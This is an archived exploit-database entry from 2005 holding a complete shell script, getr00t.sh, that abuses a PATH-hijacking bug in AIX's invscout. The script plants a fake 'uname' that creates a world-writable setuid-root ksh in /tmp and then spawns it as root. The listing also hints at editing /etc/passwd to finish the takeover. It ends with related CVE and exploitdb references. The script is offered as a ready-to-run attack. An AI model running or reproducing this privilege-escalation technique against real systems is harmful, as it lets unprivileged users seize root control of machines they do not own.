Lucene search
Ri0tPACKETSTORM:36794HistoryMar 25, 2005 - 12:00 a.m.
getr00t.sh
2005-03-2500:00:00
ri0t
packetstormsecurity.com
17
EPSS
0
Percentile
0.4%
`#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit
cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh
`
Related
cvelist
cvelist
CVE-2004-1054
2004-12-22 05:00:00
exploitdb
exploitdb
AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation
2004-12-21 00:00:00
AIX 5.3.0 - 'invscout' Local Command Execution
2005-03-25 00:00:00
cve
cve
CVE-2004-1054
2005-01-10 05:00:00
nvd
nvd
CVE-2004-1054
2005-01-10 05:00:00
securityvulns
securityvulns